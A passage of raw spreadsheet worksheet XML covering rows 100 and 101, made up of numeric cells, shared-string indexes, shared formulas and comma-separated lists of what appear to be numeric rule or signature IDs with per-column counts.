      </c>
      <c r="BZ100" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA100" s="104" t="s">
        <v>1737</v>
      </c>
      <c r="CB100" s="104">
        <v>3.0</v>
      </c>
      <c r="CC100" s="104">
        <v>6.0</v>
      </c>
      <c r="CD100" s="104" t="s">
        <v>1738</v>
      </c>
      <c r="CE100" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF100" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CG100" s="104" t="s">
        <v>1738</v>
      </c>
      <c r="CH100" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CI100" s="104">
        <v>2025644.0</v>
      </c>
      <c r="CJ100" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK100" s="104">
        <v>1.0</v>
      </c>
      <c r="CL100" s="104">
        <v>2.0</v>
      </c>
      <c r="CM100" s="105">
        <v>3.0</v>
      </c>
      <c r="CN100" s="105">
        <v>2.0</v>
      </c>
      <c r="CO100" s="105">
        <v>4.0</v>
      </c>
      <c r="CP100" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ100" s="105">
        <v>6.0</v>
      </c>
      <c r="CR100" s="105">
        <v>6.0</v>
      </c>
      <c r="CS100" s="105">
        <v>0.0</v>
      </c>
      <c r="CT100" s="105">
        <v>0.0</v>
      </c>
      <c r="CU100" s="105">
        <v>0.0</v>
      </c>
      <c r="CV100" s="105">
        <v>0.0</v>
      </c>
      <c r="CW100" s="105">
        <v>2.0</v>
      </c>
      <c r="CX100" s="105">
        <v>4.0</v>
      </c>
      <c r="CY100" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ100" s="105">
        <v>6.0</v>
      </c>
      <c r="DA100" s="105">
        <v>6.0</v>
      </c>
      <c r="DB100" s="106">
        <f t="shared" si="122"/>
        <v>2</v>
      </c>
      <c r="DC100" s="106">
        <f t="shared" si="123"/>
        <v>2</v>
      </c>
      <c r="DD100" s="106">
        <f t="shared" si="124"/>
        <v>0</v>
      </c>
      <c r="DE100" s="106">
        <f t="shared" si="125"/>
        <v>4</v>
      </c>
      <c r="DF100" s="106">
        <f t="shared" si="126"/>
        <v>4</v>
      </c>
      <c r="DG100" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH100" s="106">
        <f t="shared" si="127"/>
        <v>6</v>
      </c>
      <c r="DI100" s="106">
        <f t="shared" si="128"/>
        <v>6</v>
      </c>
      <c r="DJ100" s="106">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="DK100" s="107">
        <f t="shared" si="104"/>
        <v>0</v>
      </c>
      <c r="DL100" s="106">
        <f t="shared" si="105"/>
        <v>0</v>
      </c>
      <c r="DM100" s="108" t="s">
        <v>1739</v>
      </c>
      <c r="DN100" s="108">
        <v>4.0</v>
      </c>
      <c r="DO100" s="108">
        <v>7.0</v>
      </c>
      <c r="DP100" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ100" s="108" t="s">
        <v>1739</v>
      </c>
      <c r="DR100" s="108">
        <v>4.0</v>
      </c>
      <c r="DS100" s="108">
        <v>7.0</v>
      </c>
      <c r="DT100" s="108" t="s">
        <v>1739</v>
      </c>
      <c r="DU100" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV100" s="108" t="str">
        <f t="shared" si="154"/>
        <v>2035480, 2018959, 2025644, 53331</v>
      </c>
      <c r="DW100" s="108" t="s">
        <v>1740</v>
      </c>
      <c r="DX100" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DY100" s="163">
        <v>2025644.0</v>
      </c>
      <c r="DZ100" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA100" s="108">
        <v>1.0</v>
      </c>
      <c r="EB100" s="108">
        <v>2.0</v>
      </c>
      <c r="EC100" s="109">
        <v>3.0</v>
      </c>
      <c r="ED100" s="109">
        <v>3.0</v>
      </c>
      <c r="EE100" s="109">
        <v>5.0</v>
      </c>
      <c r="EF100" s="109">
        <v>1.0</v>
      </c>
      <c r="EG100" s="109">
        <v>6.0</v>
      </c>
      <c r="EH100" s="109">
        <v>7.0</v>
      </c>
      <c r="EI100" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ100" s="109">
        <v>0.0</v>
      </c>
      <c r="EK100" s="109">
        <v>0.0</v>
      </c>
      <c r="EL100" s="109">
        <v>0.0</v>
      </c>
      <c r="EM100" s="109">
        <v>3.0</v>
      </c>
      <c r="EN100" s="109">
        <v>5.0</v>
      </c>
      <c r="EO100" s="109">
        <v>1.0</v>
      </c>
      <c r="EP100" s="109">
        <v>6.0</v>
      </c>
      <c r="EQ100" s="109">
        <v>7.0</v>
      </c>
      <c r="ER100" s="110">
        <f t="shared" si="130"/>
        <v>3</v>
      </c>
      <c r="ES100" s="110">
        <f t="shared" si="131"/>
        <v>3</v>
      </c>
      <c r="ET100" s="110">
        <f t="shared" si="132"/>
        <v>0</v>
      </c>
      <c r="EU100" s="110">
        <f t="shared" si="133"/>
        <v>5</v>
      </c>
      <c r="EV100" s="110">
        <f t="shared" si="134"/>
        <v>5</v>
      </c>
      <c r="EW100" s="110">
        <f t="shared" si="135"/>
        <v>0</v>
      </c>
      <c r="EX100" s="110">
        <f t="shared" si="136"/>
        <v>7</v>
      </c>
      <c r="EY100" s="110">
        <f t="shared" si="137"/>
        <v>7</v>
      </c>
      <c r="EZ100" s="110">
        <f t="shared" si="138"/>
        <v>0</v>
      </c>
      <c r="FA100" s="110">
        <f t="shared" si="106"/>
        <v>0</v>
      </c>
      <c r="FB100" s="110">
        <f t="shared" si="107"/>
        <v>0</v>
      </c>
      <c r="FC100" s="111" t="s">
        <v>1741</v>
      </c>
      <c r="FD100" s="111">
        <v>8.0</v>
      </c>
      <c r="FE100" s="111">
        <v>12.0</v>
      </c>
      <c r="FF100" s="101" t="s">
        <v>229</v>
      </c>
      <c r="FG100" s="111" t="s">
        <v>1742</v>
      </c>
      <c r="FH100" s="111">
        <v>6.0</v>
      </c>
      <c r="FI100" s="111">
        <v>9.0</v>
      </c>
      <c r="FJ100" s="111" t="s">
        <v>1743</v>
      </c>
      <c r="FK100" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FL100" s="111" t="str">
        <f t="shared" si="155"/>
        <v>503331, 2002752, 2002749, 2035480, 2018959, 2009080, 2025644, 2000419</v>
      </c>
      <c r="FM100" s="111" t="s">
        <v>1744</v>
      </c>
      <c r="FN100" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FO100" s="164">
        <v>2025644.0</v>
      </c>
      <c r="FP100" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ100" s="111">
        <v>1.0</v>
      </c>
      <c r="FR100" s="111">
        <v>2.0</v>
      </c>
      <c r="FS100" s="112">
        <v>3.0</v>
      </c>
      <c r="FT100" s="112">
        <v>3.0</v>
      </c>
      <c r="FU100" s="112">
        <v>8.0</v>
      </c>
      <c r="FV100" s="112">
        <v>1.0</v>
      </c>
      <c r="FW100" s="112">
        <v>12.0</v>
      </c>
      <c r="FX100" s="112">
        <v>13.0</v>
      </c>
      <c r="FY100" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ100" s="112">
        <v>1.0</v>
      </c>
      <c r="GA100" s="112">
        <v>0.0</v>
      </c>
      <c r="GB100" s="112">
        <v>0.0</v>
      </c>
      <c r="GC100" s="112">
        <v>3.0</v>
      </c>
      <c r="GD100" s="112">
        <v>6.0</v>
      </c>
      <c r="GE100" s="112">
        <v>1.0</v>
      </c>
      <c r="GF100" s="112">
        <v>8.0</v>
      </c>
      <c r="GG100" s="112">
        <v>9.0</v>
      </c>
      <c r="GH100" s="113">
        <f t="shared" si="139"/>
        <v>3</v>
      </c>
      <c r="GI100" s="113">
        <f t="shared" si="140"/>
        <v>3</v>
      </c>
      <c r="GJ100" s="113">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="GK100" s="113">
        <f t="shared" si="142"/>
        <v>8</v>
      </c>
      <c r="GL100" s="113">
        <f t="shared" si="143"/>
        <v>6</v>
      </c>
      <c r="GM100" s="113">
        <f t="shared" si="144"/>
        <v>0</v>
      </c>
      <c r="GN100" s="113">
        <f t="shared" si="145"/>
        <v>13</v>
      </c>
      <c r="GO100" s="113">
        <f t="shared" si="146"/>
        <v>9</v>
      </c>
      <c r="GP100" s="113">
        <f t="shared" si="147"/>
        <v>0</v>
      </c>
      <c r="GQ100" s="114">
        <f t="shared" si="108"/>
        <v>0.5</v>
      </c>
      <c r="GR100" s="113">
        <f t="shared" si="109"/>
        <v>1</v>
      </c>
      <c r="GS100" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT100" s="94" t="s">
        <v>1745</v>
      </c>
      <c r="GU100" s="130">
        <v>12449.0</v>
      </c>
      <c r="GV100" s="116">
        <v>1.0</v>
      </c>
      <c r="GW100" s="116">
        <v>4.0</v>
      </c>
      <c r="GX100" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY100" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ100" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA100" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB100" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC100" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD100" s="131">
        <v>12449.0</v>
      </c>
      <c r="HE100" s="131">
        <v>12449.0</v>
      </c>
      <c r="HF100" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG100" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH100" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI100" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ100" s="93" t="s">
        <v>1746</v>
      </c>
      <c r="HK100" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL100" s="93">
        <v>2.0</v>
      </c>
      <c r="HM100" s="93">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="HN100" s="93">
        <v>0.0</v>
      </c>
      <c r="HO100" s="93">
        <v>0.0</v>
      </c>
      <c r="HP100" s="93">
        <v>1.0</v>
      </c>
      <c r="HQ100" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR100" s="118">
        <f t="shared" si="54"/>
        <v>0.5</v>
      </c>
      <c r="HS100" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT100" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU100" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV100" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HW100" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HX100" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HY100" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ100" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA100" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB100" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC100" s="120" t="str">
        <f t="shared" ref="IC100:IC112" si="162">HV100</f>
        <v>-</v>
      </c>
      <c r="ID100" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IE100" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF100" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG100" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH100" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II100" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ100" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK100" s="99">
        <v>3.0</v>
      </c>
      <c r="IL100" s="99">
        <v>0.0</v>
      </c>
      <c r="IM100" s="121">
        <f t="shared" si="159"/>
        <v>0</v>
      </c>
      <c r="IN100" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO100" s="98">
        <v>0.0</v>
      </c>
      <c r="IP100" s="123">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="IQ100" s="118">
        <f t="shared" si="59"/>
        <v>0</v>
      </c>
      <c r="IR100" s="118">
        <f t="shared" si="60"/>
        <v>0</v>
      </c>
      <c r="IS100" s="124" t="s">
        <v>225</v>
      </c>
      <c r="IT100" s="127"/>
      <c r="IU100" s="127"/>
      <c r="IV100" s="127"/>
      <c r="IW100" s="127"/>
      <c r="IX100" s="127"/>
      <c r="IY100" s="127"/>
      <c r="IZ100" s="127"/>
      <c r="JA100" s="127"/>
      <c r="JB100" s="127"/>
      <c r="JC100" s="127"/>
      <c r="JD100" s="127"/>
      <c r="JE100" s="127"/>
      <c r="JF100" s="127"/>
      <c r="JG100" s="127"/>
      <c r="JH100" s="127"/>
      <c r="JI100" s="127"/>
      <c r="JJ100" s="127"/>
      <c r="JK100" s="127"/>
      <c r="JL100" s="127"/>
      <c r="JM100" s="127"/>
      <c r="JN100" s="127"/>
      <c r="JO100" s="127"/>
      <c r="JP100" s="127"/>
      <c r="JQ100" s="127"/>
      <c r="JR100" s="127"/>
      <c r="JS100" s="127"/>
      <c r="JT100" s="127"/>
      <c r="JU100" s="127"/>
      <c r="JV100" s="127"/>
      <c r="JW100" s="127"/>
      <c r="JX100" s="127"/>
      <c r="JY100" s="127"/>
      <c r="JZ100" s="127"/>
      <c r="KA100" s="127"/>
      <c r="KB100" s="127"/>
      <c r="KC100" s="127"/>
      <c r="KD100" s="127"/>
      <c r="KE100" s="127"/>
      <c r="KF100" s="127"/>
      <c r="KG100" s="127"/>
      <c r="KH100" s="127"/>
      <c r="KI100" s="127"/>
      <c r="KJ100" s="127"/>
      <c r="KK100" s="127"/>
      <c r="KL100" s="127"/>
      <c r="KM100" s="127"/>
      <c r="KN100" s="127"/>
      <c r="KO100" s="127"/>
      <c r="KP100" s="127"/>
      <c r="KQ100" s="127"/>
      <c r="KR100" s="127"/>
      <c r="KS100" s="127"/>
      <c r="KT100" s="127"/>
      <c r="KU100" s="127"/>
      <c r="KV100" s="127"/>
      <c r="KW100" s="127"/>
      <c r="KX100" s="127"/>
      <c r="KY100" s="127"/>
      <c r="KZ100" s="127"/>
      <c r="LA100" s="127"/>
      <c r="LB100" s="127"/>
      <c r="LC100" s="127"/>
      <c r="LD100" s="127"/>
      <c r="LE100" s="127"/>
      <c r="LF100" s="127"/>
      <c r="LG100" s="127"/>
      <c r="LH100" s="127"/>
      <c r="LI100" s="127"/>
      <c r="LJ100" s="127"/>
      <c r="LK100" s="127"/>
      <c r="LL100" s="127"/>
      <c r="LM100" s="127"/>
      <c r="LN100" s="127"/>
      <c r="LO100" s="127"/>
      <c r="LP100" s="127"/>
      <c r="LQ100" s="127"/>
      <c r="LR100" s="127"/>
      <c r="LS100" s="127"/>
      <c r="LT100" s="127"/>
      <c r="LU100" s="127"/>
      <c r="LV100" s="127"/>
      <c r="LW100" s="127"/>
      <c r="LX100" s="127"/>
      <c r="LY100" s="127"/>
      <c r="LZ100" s="127"/>
      <c r="MA100" s="127"/>
      <c r="MB100" s="127"/>
      <c r="MC100" s="127"/>
      <c r="MD100" s="127"/>
      <c r="ME100" s="127"/>
      <c r="MF100" s="127"/>
      <c r="MG100" s="127"/>
      <c r="MH100" s="127"/>
      <c r="MI100" s="127"/>
      <c r="MJ100" s="127"/>
      <c r="MK100" s="127"/>
      <c r="ML100" s="127"/>
      <c r="MM100" s="127"/>
      <c r="MN100" s="127"/>
      <c r="MO100" s="127"/>
      <c r="MP100" s="127"/>
      <c r="MQ100" s="127"/>
      <c r="MR100" s="127"/>
      <c r="MS100" s="127"/>
      <c r="MT100" s="127"/>
      <c r="MU100" s="127"/>
      <c r="MV100" s="127"/>
      <c r="MW100" s="127"/>
      <c r="MX100" s="127"/>
      <c r="MY100" s="127"/>
      <c r="MZ100" s="127"/>
      <c r="NA100" s="127"/>
      <c r="NB100" s="127"/>
      <c r="NC100" s="127"/>
      <c r="ND100" s="127"/>
      <c r="NE100" s="127"/>
      <c r="NF100" s="127"/>
      <c r="NG100" s="127"/>
      <c r="NH100" s="127"/>
      <c r="NI100" s="127"/>
      <c r="NJ100" s="127"/>
      <c r="NK100" s="127"/>
      <c r="NL100" s="127"/>
      <c r="NM100" s="127"/>
      <c r="NN100" s="127"/>
      <c r="NO100" s="127"/>
      <c r="NP100" s="127"/>
      <c r="NQ100" s="127"/>
      <c r="NR100" s="127"/>
      <c r="NS100" s="127"/>
      <c r="NT100" s="127"/>
      <c r="NU100" s="127"/>
      <c r="NV100" s="127"/>
      <c r="NW100" s="127"/>
      <c r="NX100" s="127"/>
      <c r="NY100" s="127"/>
    </row>
    <row r="101" ht="153.75" customHeight="1">
      <c r="B101" s="89" t="s">
        <v>244</v>
      </c>
      <c r="C101" s="90" t="s">
        <v>427</v>
      </c>
      <c r="D101" s="90" t="s">
        <v>245</v>
      </c>
      <c r="E101" s="90" t="s">
        <v>1747</v>
      </c>
      <c r="F101" s="90" t="s">
        <v>1748</v>
      </c>
      <c r="G101" s="91" t="s">
        <v>1749</v>
      </c>
      <c r="H101" s="90" t="s">
        <v>1750</v>
      </c>
      <c r="I101" s="92" t="s">
        <v>1751</v>
      </c>
      <c r="J101" s="92" t="s">
        <v>1752</v>
      </c>
      <c r="K101" s="92" t="s">
        <v>1753</v>
      </c>
      <c r="L101" s="93" t="s">
        <v>1541</v>
      </c>
      <c r="M101" s="93">
        <v>2.0</v>
      </c>
      <c r="N101" s="93">
        <v>1.0</v>
      </c>
      <c r="O101" s="93">
        <v>0.0</v>
      </c>
      <c r="P101" s="93">
        <v>1.0</v>
      </c>
      <c r="Q101" s="93">
        <f t="shared" si="160"/>
        <v>1</v>
      </c>
      <c r="R101" s="93">
        <v>1.0</v>
      </c>
      <c r="S101" s="93">
        <v>0.0</v>
      </c>
      <c r="T101" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U101" s="98" t="s">
        <v>269</v>
      </c>
      <c r="V101" s="96" t="s">
        <v>1542</v>
      </c>
      <c r="W101" s="96" t="s">
        <v>12</v>
      </c>
      <c r="X101" s="97" t="s">
        <v>477</v>
      </c>
      <c r="Y101" s="96" t="s">
        <v>1754</v>
      </c>
      <c r="Z101" s="126" t="s">
        <v>1755</v>
      </c>
      <c r="AA101" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB101" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC101" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD101" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE101" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF101" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG101" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH101" s="99" t="s">
        <v>1756</v>
      </c>
      <c r="AI101" s="99" t="s">
        <v>481</v>
      </c>
      <c r="AJ101" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK101" s="100" t="s">
        <v>1757</v>
      </c>
      <c r="AL101" s="100">
        <v>4.0</v>
      </c>
      <c r="AM101" s="100">
        <v>44.0</v>
      </c>
      <c r="AN101" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO101" s="100" t="s">
        <v>1757</v>
      </c>
      <c r="AP101" s="100">
        <v>4.0</v>
      </c>
      <c r="AQ101" s="100">
        <v>44.0</v>
      </c>
      <c r="AR101" s="100" t="s">
        <v>1757</v>
      </c>
      <c r="AS101" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT101" s="100" t="str">
        <f>IF(AR101="-",AS101,AR101)</f>
        <v>29456, 384, 366, 408</v>
      </c>
      <c r="AU101" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV101" s="100" t="s">
        <v>1757</v>
      </c>
      <c r="AW101" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX101" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY101" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ101" s="100">
        <v>0.0</v>
      </c>
      <c r="BA101" s="102">
        <v>2.0</v>
      </c>
      <c r="BB101" s="102">
        <v>0.0</v>
      </c>
      <c r="BC101" s="102">
        <v>11.0</v>
      </c>
      <c r="BD101" s="102">
        <v>44.0</v>
      </c>
      <c r="BE101" s="102">
        <v>0.0</v>
      </c>
      <c r="BF101" s="102">
        <v>0.0</v>
      </c>
      <c r="BG101" s="102">
        <v>0.0</v>
      </c>
      <c r="BH101" s="102">
        <v>0.0</v>
      </c>
      <c r="BI101" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ101" s="102">
        <v>11.0</v>
      </c>
      <c r="BK101" s="102">
        <v>44.0</v>
      </c>
      <c r="BL101" s="103">
        <f t="shared" si="112"/>
        <v>0</v>
      </c>
      <c r="BM101" s="103">
        <f t="shared" si="113"/>
        <v>0</v>
      </c>
      <c r="BN101" s="103">
        <f t="shared" si="114"/>
        <v>0</v>
      </c>
      <c r="BO101" s="103">
        <f t="shared" si="115"/>
        <v>11</v>
      </c>
      <c r="BP101" s="103">
        <f t="shared" si="116"/>
        <v>11</v>
      </c>
      <c r="BQ101" s="103">
        <f t="shared" si="117"/>
        <v>0</v>
      </c>
      <c r="BR101" s="103">
        <f t="shared" si="118"/>
        <v>44</v>
      </c>
      <c r="BS101" s="103">
        <f t="shared" si="119"/>
        <v>44</v>
      </c>
      <c r="BT101" s="103">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="BU101" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV101" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW101" s="104" t="s">
        <v>1758</v>
      </c>
      <c r="BX101" s="104">
        <v>5.0</v>
      </c>
      <c r="BY101" s="104">
        <v>54.0</v>
      </c>
      <c r="BZ101" s="101">
        <v>2100366.0</v>
      </c>
      <c r="CA101" s="104" t="s">
        <v>1757</v>
      </c>
      <c r="CB101" s="104">
        <v>4.0</v>
      </c>
      <c r="CC101" s="104">
        <v>44.0</v>
      </c>
      <c r="CD101" s="104" t="s">
        <v>1758</v>
      </c>
      <c r="CE101" s="104">
        <v>2100366.0</v>
      </c>
      <c r="CF101" s="104" t="str">
        <f t="shared" ref="CF101:CF106" si="163">IF(CD101="-",CE101,CD101)</f>
        <v>29456, 384, 366, 408, 2100366</v>
      </c>
      <c r="CG101" s="105" t="s">
        <v>12</v>
      </c>
      <c r="CH101" s="104" t="s">
        <v>1758</v>
      </c>
      <c r="CI101" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ101" s="105" t="s">
        <v>12</v>
      </c>
      <c r="CK101" s="104">
        <v>0.0</v>
      </c>
      <c r="CL101" s="104">
        <v>0.0</v>
      </c>
      <c r="CM101" s="105">
        <v>0.0</v>
      </c>
      <c r="CN101" s="105">
        <v>0.0</v>
      </c>
      <c r="CO101" s="105">
        <v>11.0</v>
      </c>
      <c r="CP101" s="105">
        <v>44.0</v>
      </c>
      <c r="CQ101" s="105">
        <v>10.0</v>
      </c>
      <c r="CR101" s="105">
        <v>44.0</v>
      </c>
      <c r="CS101" s="105">
        <v>0.0</v>
      </c>
      <c r="CT101" s="105">
        <v>0.0</v>
      </c>
      <c r="CU101" s="105">
        <v>0.0</v>
      </c>
      <c r="CV101" s="105">
        <v>0.0</v>
      </c>
      <c r="CW101" s="105">
        <v>0.0</v>
      </c>
      <c r="CX101" s="105">
        <v>11.0</v>
      </c>
      <c r="CY101" s="105">
        <v>44.0</v>
      </c>
      <c r="CZ101" s="105">
        <v>0.0</v>
      </c>
      <c r="DA101" s="105">
        <v>44.0</v>
      </c>
      <c r="DB101" s="106">
        <f t="shared" si="122"/>
        <v>0</v>
      </c>
      <c r="DC101" s="106">
        <f t="shared" si="123"/>
        <v>0</v>
      </c>
      <c r="DD101" s="106">
        <f t="shared" si="124"/>
        <v>0</v>
      </c>
      <c r="DE101" s="106">
        <f t="shared" si="125"/>
        <v>11</v>
      </c>
      <c r="DF101" s="106">
        <f t="shared" si="126"/>
        <v>11</v>
      </c>
      <c r="DG101" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH101" s="106">
        <f t="shared" si="127"/>
        <v>44</v>
      </c>
      <c r="DI101" s="106">
        <f t="shared" si="128"/>
        <v>44</v>
      </c>
      <c r="DJ101" s="106">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="DK101" s="107">
        <f t="shared" si="104"/>
        <v>0</v>
      </c>
      <c r="DL101" s="106">
        <f t="shared" si="105"/>
        <v>0</v>
      </c>
      <c r="DM101" s="108" t="s">
        <v>1758</v>
      </c>
      <c r="DN101" s="108">
        <v>5.0</v>
      </c>
      <c r="DO101" s="108">
        <v>54.0</v>
      </c>
      <c r="DP101" s="101">
        <v>2100366.0</v>
      </c>
      <c r="DQ101" s="108" t="s">
        <v>1757</v>
      </c>
      <c r="DR101" s="108">
        <v>4.0</v>
      </c>
      <c r="DS101" s="108">
        <v>44.0</v>
      </c>
      <c r="DT101" s="108" t="s">
        <v>1758</v>
      </c>
      <c r="DU101" s="108">
        <v>2100366.0</v>
      </c>
      <c r="DV101" s="108" t="str">
        <f t="shared" si="154"/>
        <v>29456, 384, 366, 408, 2100366</v>
      </c>
      <c r="DW101" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX101" s="108" t="s">
        <v>1758</v>
      </c>
      <c r="DY101" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ101" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA101" s="108">
        <v>0.0</v>
      </c>
      <c r="EB101" s="108">
        <v>0.0</v>
      </c>
      <c r="EC101" s="109">
        <v>2.0</v>
      </c>
      <c r="ED101" s="109">
        <v>0.0</v>
      </c>
      <c r="EE101" s="109">
        <v>11.0</v>
      </c>
      <c r="EF101" s="109">
        <v>44.0</v>
      </c>
      <c r="EG101" s="109">
        <v>10.0</v>
      </c>
      <c r="EH101" s="109">
        <v>44.0</v>
      </c>
      <c r="EI101" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ101" s="109">
        <v>0.0</v>
      </c>
      <c r="EK101" s="109">
        <v>0.0</v>
      </c>
      <c r="EL101" s="109">
        <v>0.0</v>
      </c>
      <c r="EM101" s="109">
        <v>0.0</v>
      </c>
      <c r="EN101" s="109">
        <v>11.0</v>
      </c>
      <c r="EO101" s="109">
        <v>44.0</v>
      </c>
      <c r="EP101" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ101" s="109">
        <v>44.0</v>
      </c>
      <c r="ER101" s="110">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="ES101" s="110">
        <f t="shared" si="131"/>
        <v>0</v>
      </c>
      <c r="ET101" s="110">
        <f t="shared" si="132"/>
        <v>0</v>
      </c>
      <c r="EU101" s="110">
        <f t="shared" si="133"/>
        <v>11</v>
      </c>
      <c r="EV101" s="110">
        <f t="shared" si="134"/>
        <v>11</v>
      </c>
      <c r="EW101" s="110">
        <f t="shared" si="135"/>
        <v>0</v>
      </c>
      <c r="EX101" s="110">
        <f t="shared" si="136"/>
        <v>44</v>
      </c>
      <c r="EY101" s="110">
        <f t="shared" si="137"/>
        <v>44</v>
      </c>
      <c r="EZ101" s="110">
        <f t="shared" si="138"/>
        <v>0</v>
      </c>
      <c r="FA101" s="110">
        <f t="shared" si="106"/>
        <v>0</v>
      </c>
      <c r="FB101" s="110">
        <f t="shared" si="107"/>
        <v>0</v>
      </c>
      <c r="FC101" s="111" t="s">
        <v>1759</v>
      </c>
      <c r="FD101" s="111">
        <v>10.0</v>
      </c>
      <c r="FE101" s="111">
        <v>82.0</v>
      </c>
      <c r="FF101" s="101" t="s">
        <v>1760</v>
      </c>
      <c r="FG101" s="111" t="s">
        <v>1757</v>
      </c>
      <c r="FH101" s="111">
        <v>4.0</v>
      </c>
      <c r="FI101" s="111">
        <v>44.0</v>
      </c>
      <c r="FJ101" s="111" t="s">
        <v>1759</v>
      </c>
      <c r="FK101" s="111" t="s">
        <v>1760</v>
      </c>
      <c r="FL101" s="111" t="str">
        <f t="shared" si="155"/>
        <v>29456, 384, 366, 408, 2100469, 2100384, 2002752, 2002749, 2100366, 2100408</v>
      </c>
      <c r="FM101" s="111"/>
      <c r="FN101" s="111"/>
      <c r="FO101" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP101" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ101" s="111">
        <v>0.0</v>
      </c>
      <c r="FR101" s="111">
        <v>0.0</v>
      </c>
      <c r="FS101" s="112">
        <v>0.0</v>
      </c>
      <c r="FT101" s="112">
        <v>0.0</v>
      </c>
      <c r="FU101" s="112">
        <v>11.0</v>
      </c>
      <c r="FV101" s="112">
        <v>44.0</v>
      </c>
      <c r="FW101" s="112">
        <v>38.0</v>
      </c>
      <c r="FX101" s="112">
        <v>50.0</v>
      </c>
      <c r="FY101" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ101" s="112">
        <v>0.0</v>
      </c>
      <c r="GA101" s="112">
        <v>0.0</v>
      </c>
      <c r="GB101" s="112">
        <v>0.0</v>
      </c>
      <c r="GC101" s="112">
        <v>0.0</v>
      </c>
      <c r="GD101" s="112">
        <v>11.0</v>
      </c>
      <c r="GE101" s="112">
        <v>44.0</v>
      </c>
      <c r="GF101" s="112">
        <v>0.0</v>
      </c>
      <c r="GG101" s="112">
        <v>44.0</v>
      </c>
      <c r="GH101" s="113">
        <f t="shared" si="139"/>
        <v>0</v>
      </c>
      <c r="GI101" s="113">
        <f t="shared" si="140"/>
        <v>0</v>
      </c>
      <c r="GJ101" s="113">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="GK101" s="113">
        <f t="shared" si="142"/>
        <v>11</v>
      </c>
      <c r="GL101" s="113">
        <f t="shared" si="143"/>
        <v>11</v>
      </c>
      <c r="GM101" s="113">
        <f t="shared" si="144"/>
